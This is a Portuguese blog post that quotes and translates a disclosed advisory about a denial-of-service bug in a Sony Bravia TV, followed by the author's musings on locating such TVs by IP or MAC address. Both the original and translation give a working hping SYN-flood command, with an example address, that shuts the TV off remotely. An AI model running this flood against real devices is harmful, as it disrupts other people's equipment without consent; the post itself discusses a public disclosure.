Essa questão me deixou muito curioso, já que descobri ela no mês de abril, segue texto em inglês de como foi descoberto essa vulnerabilidade: |
Running a hping command against a Sony Bravia TV (KDL-32CX525), |
all the functions stop working instantly. You cannot change the |
volume, channels or access any function. Instantly. After 35 seconds |
the TV stop working and back. This happens 3 times. At fourth time, the |
TV shuts down. In less than 3 minutes, the TV is off remotely. It is |
necessary to turn on the TV physically. |
Attack: |
hping -S TV.IP.Address -p anyport -i u1 --flood |
Example: hping -S 10.0.0.3 -p 2828 -i u1 --flood" |
Tradução:
"Brincando com a minha TV, eu achei um bug que conseguia parar o despositivo. |
Rodando o comando "hping" contra a Tv Sony Bravia (KDL-32CX525), todas as funções pararam instantaneamente.Você não consegue mudar o volume, canais ou acessar qualquer função.Depois de 35 segundos a TV para e logo volta.Isso acontece 3 vezes.Na quarta vez, a Tv desliga.Em menos de 3 minutos, a Tv é desligada remotamente.Por isso é necessário ligar a Tv manualmente. |
Ataque: |
hping -S TV.IP.Address -p anyport -i u1 --flood |
Exemplo: hping -S 10.0.0.3 -p 2828 -i u1 --flood" |
Opinião:
O texto foi traduzido por mim.A respeito dessa vulnerabilidade, se podemos chamar ela assim, em conversa com o professor de faculdade, ele me levantou a seguinte questão - Você consegue fazer DOS, mas você sabe todos os ip's dessas Tv's?Como será feito para descobrir isso?
Fonte:http://www.exploit-db.com/exploits/18705/Na hora de cabeça não veio muitas ideias, mas ao passar dos dias, me veio a seguinte ideia: Se descobrirmos o número de Mac delas?Poderíamos fazer algum tipo de ataque?Isso parece pouco provável de acontecer, somente se surgir uma sequencia lógica de números e letras, aí poderíamos, ir disparando para uma lista evendo qual respondia para realizar os ataques.Irei procurar mais sobre isso e trarei para vocês meus novos pensamentos.
Nenhum comentário:
Postar um comentário